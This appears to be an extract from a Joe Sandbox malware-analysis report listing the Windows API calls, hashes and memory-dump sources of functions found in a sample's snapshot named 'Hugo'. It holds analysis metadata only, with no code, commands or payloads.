                                                                                                                                                                                                              • Opcode ID: ff33f3bc9b01c099abcfd5fd983c5d7473ae2c403c12ca0141e7f243b4c1d5c4
                                                                                                                                                                                                              • Instruction ID: ac32d96c11f34b08812807b049f5a494a31b5d6f89a5e594a478cd9560aa050d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ff33f3bc9b01c099abcfd5fd983c5d7473ae2c403c12ca0141e7f243b4c1d5c4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 79417C71900205EFDF04EF54DC85AAAB7B8FF45720F1441A5ED009B296DB34DE51EBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00F6FBEF,00000000,?,?,00000000,?,00F539E2,00000004,00000000,00000000), ref: 00FA8CA7
                                                                                                                                                                                                              • EnableWindow.USER32(?,00000000), ref: 00FA8CCD
                                                                                                                                                                                                              • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00FA8D2C
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000004), ref: 00FA8D40
                                                                                                                                                                                                              • EnableWindow.USER32(?,00000001), ref: 00FA8D66
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00FA8D8A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 642888154-0
                                                                                                                                                                                                              • Opcode ID: 1c6f5d6fe5237fcac21df16023ea021c5d07354e00fb684f86686936dbad8945
                                                                                                                                                                                                              • Instruction ID: 045730c3da41d02b161c0197f8a7aa0673d35d8c10687e6b1e4bfb276be2f2f6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c6f5d6fe5237fcac21df16023ea021c5d07354e00fb684f86686936dbad8945
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6C41B6B0A01248AFDB25DF24C885BA57BF1FB47364F1440A9E5094F2A3DBB16846EF60
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetForegroundWindow.USER32(?,?,00000000), ref: 00F92D45
                                                                                                                                                                                                                • Part of subcall function 00F8EF33: GetWindowRect.USER32(?,?), ref: 00F8EF4B
                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 00F92D6F
                                                                                                                                                                                                              • GetWindowRect.USER32(00000000), ref: 00F92D76
                                                                                                                                                                                                              • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00F92DB2
                                                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 00F92DDE
                                                                                                                                                                                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00F92E3C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2387181109-0
                                                                                                                                                                                                              • Opcode ID: 921312b3b116de9d6c625c48d06f1397932a49e8fc1fbffd28d07fa2f118eae6
                                                                                                                                                                                                              • Instruction ID: 4f4409448c4cd4a3071c4a5783126f6aaca18196be2c4733f1c8ae91f480072b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 921312b3b116de9d6c625c48d06f1397932a49e8fc1fbffd28d07fa2f118eae6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4531D072905315AFDB20DF18CC49B9BB7A9FF85314F00091AF489A7291DB30E909DB92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 00F755F9
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00F75616
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00F7564E
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00F7566C
                                                                                                                                                                                                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00F75674
                                                                                                                                                                                                              • _wcsstr.LIBVCRUNTIME ref: 00F7567E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 72514467-0
                                                                                                                                                                                                              • Opcode ID: fd5ac322de1fa6f5ef4a488f9af2ccd757ba329054305b109f6f073b8e1c9859
                                                                                                                                                                                                              • Instruction ID: dc378ef36b2985a8898ae8a368b3f02b6421b15df42c1bb1e68003e63756ed95
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fd5ac322de1fa6f5ef4a488f9af2ccd757ba329054305b109f6f073b8e1c9859
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F2123726046047BEB156B28DC49E7F7BA8DF49B70F14802BF80ACA191EFA5DC41B661
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F15851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F155D1,?,?,00F54B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00F15871
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00F862C0
                                                                                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 00F863DA
                                                                                                                                                                                                              • CoCreateInstance.OLE32(00FB0CC4,00000000,00000001,00FB0B34,?), ref: 00F863F3
                                                                                                                                                                                                              • CoUninitialize.OLE32 ref: 00F86411
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                                                                                                              • String ID: .lnk
                                                                                                                                                                                                              • API String ID: 3172280962-24824748
                                                                                                                                                                                                              • Opcode ID: 715f45dddf1e510f692363ea1fcbd6d089ec6cae3be366510fb78a77c6a43e92
                                                                                                                                                                                                              • Instruction ID: 70c7353ce345fc80af9131bc26c353a4e8ebf9f332050c6d1eb48e98858ca1db
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 715f45dddf1e510f692363ea1fcbd6d089ec6cae3be366510fb78a77c6a43e92
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3AD15171A042019FC714EF24C884AAABBE5FF89724F14885DF889DB361CB35EC45DB92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00FA8740
                                                                                                                                                                                                              • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00FA8765
                                                                                                                                                                                                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00FA877D
                                                                                                                                                                                                              • GetSystemMetrics.USER32(00000004), ref: 00FA87A6
                                                                                                                                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00F8C1F2,00000000), ref: 00FA87C6
                                                                                                                                                                                                                • Part of subcall function 00F1249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00F124B0
                                                                                                                                                                                                              • GetSystemMetrics.USER32(00000004), ref: 00FA87B1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$Long$MetricsSystem
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2294984445-0
                                                                                                                                                                                                              • Opcode ID: c25fe49335e69fd03b1379a32282f16c35c79e68098e8d4c12cea67172f41b24
                                                                                                                                                                                                              • Instruction ID: c955953cf1aa69fcd50d31044e0af63143e6e416549505f439e4070fa13fed55
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c25fe49335e69fd03b1379a32282f16c35c79e68098e8d4c12cea67172f41b24
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C72190F1A102459FCB149F38CC48A6A3BA5EB463B5F244629F927C65E0EEB08851EB10
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00F336E9,00F33355), ref: 00F33700
                                                                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F3370E
                                                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F33727
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,00F336E9,00F33355), ref: 00F33779
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                                                                              • Opcode ID: 6c613bd10b56982e618c6b5e41e4f4ff4806cb6161f43a4fc5e159b983883dc4
                                                                                                                                                                                                              • Instruction ID: 7ce81f6e64afbaf484555f8af8b98bf2d1eb2952d2fda9e30f4450947256e0a7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6c613bd10b56982e618c6b5e41e4f4ff4806cb6161f43a4fc5e159b983883dc4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7101D4B7A5E3156EAA24A7B4BCCA76A3F95EB45772F20022AF510811F0EF559D027240
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00F34D53,00000000,?,?,00F368E2,?,?,00000000), ref: 00F430EB
                                                                                                                                                                                                              • _free.LIBCMT ref: 00F4311E
                                                                                                                                                                                                              • _free.LIBCMT ref: 00F43146
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,00000000), ref: 00F43153
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,00000000), ref: 00F4315F
                                                                                                                                                                                                              • _abort.LIBCMT ref: 00F43165
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3160817290-0
                                                                                                                                                                                                              • Opcode ID: 3f49217d830e70d23e634a1837165382f2434d4e87840ca0edb2f593ffb4544e
                                                                                                                                                                                                              • Instruction ID: 879fd82b3ce938d708dd2a5c530303a6a81f90e9d763caaa37cf6cc5e233a176
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f49217d830e70d23e634a1837165382f2434d4e87840ca0edb2f593ffb4544e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20F0C876D4460526E6127735AC46B5E3E7A9FC1770B250425FE25D22E1EE288A027161
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F11F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F11F87
                                                                                                                                                                                                                • Part of subcall function 00F11F2D: SelectObject.GDI32(?,00000000), ref: 00F11F96
                                                                                                                                                                                                                • Part of subcall function 00F11F2D: BeginPath.GDI32(?), ref: 00F11FAD
                                                                                                                                                                                                                • Part of subcall function 00F11F2D: SelectObject.GDI32(?,00000000), ref: 00F11FD6
                                                                                                                                                                                                              • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00FA94AA
                                                                                                                                                                                                              • LineTo.GDI32(?,00000003,00000000), ref: 00FA94BE
                                                                                                                                                                                                              • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00FA94CC
                                                                                                                                                                                                              • LineTo.GDI32(?,00000000,00000003), ref: 00FA94DC
                                                                                                                                                                                                              • EndPath.GDI32(?), ref: 00FA94EC
                                                                                                                                                                                                              • StrokePath.GDI32(?), ref: 00FA94FC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 43455801-0
                                                                                                                                                                                                              • Opcode ID: aa64e0fbcd405d191382f55ed5af5dbe642010df1727124fcf353d370cf7e74c
                                                                                                                                                                                                              • Instruction ID: e40971369fbdad94acf60cb2254ff41ef3d73c26c50947375b8350f20b41f515
                                                                                                                                                                                                              • Opcode Fuzzy Hash: aa64e0fbcd405d191382f55ed5af5dbe642010df1727124fcf353d370cf7e74c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 40111BB200014DBFEF029F90DC89E9A7F6DEF09360F04C021BA1A4A1A1D7719D56EBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 00F75B7C
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00F75B8D
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F75B94
                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00F75B9C
                                                                                                                                                                                                              • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00F75BB3
                                                                                                                                                                                                              • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00F75BC5
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CapsDevice$Release
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1035833867-0
                                                                                                                                                                                                              • Opcode ID: 79d022d1f2be042c333030e935484a7f69f7b49ae6cc018205297dec75fe6c3e
                                                                                                                                                                                                              • Instruction ID: fc91f6df71cbe1f952c49378f13ae662702e5b05d52e88cdebbc0d80d3c2352d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 79d022d1f2be042c333030e935484a7f69f7b49ae6cc018205297dec75fe6c3e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 240167B5E00718BBEB109FA59C49F5E7F78EF49751F008066FA09A7280D6709C01DF91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F132AF
                                                                                                                                                                                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 00F132B7
                                                                                                                                                                                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F132C2
                                                                                                                                                                                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F132CD
                                                                                                                                                                                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 00F132D5
                                                                                                                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F132DD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Virtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4278518827-0
                                                                                                                                                                                                              • Opcode ID: 547dba7ce31a4efe8b579993bff08915d64566c8a8d8b65f26e11422926d02a4
                                                                                                                                                                                                              • Instruction ID: ff30aab32527e594c6817ac378d23f72eace5e6ef7c569bea0a7375cc1acbafe
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 547dba7ce31a4efe8b579993bff08915d64566c8a8d8b65f26e11422926d02a4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 570167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00F7F447
                                                                                                                                                                                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00F7F45D
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 00F7F46C
                                                                                                                                                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F7F47B
                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F7F485
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F7F48C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 839392675-0
                                                                                                                                                                                                              • Opcode ID: 56aa4d24b3c44cb44429864121481ae60d9875d0c96721579804873c3b8623d2
                                                                                                                                                                                                              • Instruction ID: 7b90630ca564c3e9461158ea4209eb46b8ca8ac384febbdf6ed1a0b6698c3b26
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 56aa4d24b3c44cb44429864121481ae60d9875d0c96721579804873c3b8623d2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0CF03AB224115CBBE7215B629C0EEEF3B7CEFC7B11F000059F60691190DBA06A02E6B5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetClientRect.USER32(?), ref: 00F534EF
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001328,00000000,?), ref: 00F53506
                                                                                                                                                                                                              • GetWindowDC.USER32(?), ref: 00F53512
                                                                                                                                                                                                              • GetPixel.GDI32(00000000,?,?), ref: 00F53521
                                                                                                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00F53533
                                                                                                                                                                                                              • GetSysColor.USER32(00000005), ref: 00F5354D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 272304278-0
                                                                                                                                                                                                              • Opcode ID: c4aecc27b232bc4cde1bd1d65f1a1c319eb96f276f34fd2210b223f7089df782
                                                                                                                                                                                                              • Instruction ID: fd281ac3a4bd7de7bfd610b342d1e5a33dd58c6bebec58e5c2171b09532552e3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c4aecc27b232bc4cde1bd1d65f1a1c319eb96f276f34fd2210b223f7089df782
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 88016DB1900109EFDB505FA4DC08FE97BB5FF05321F550160FA2AA25A0DB311E91BF10
                                                                                                                                                                                                              APIs
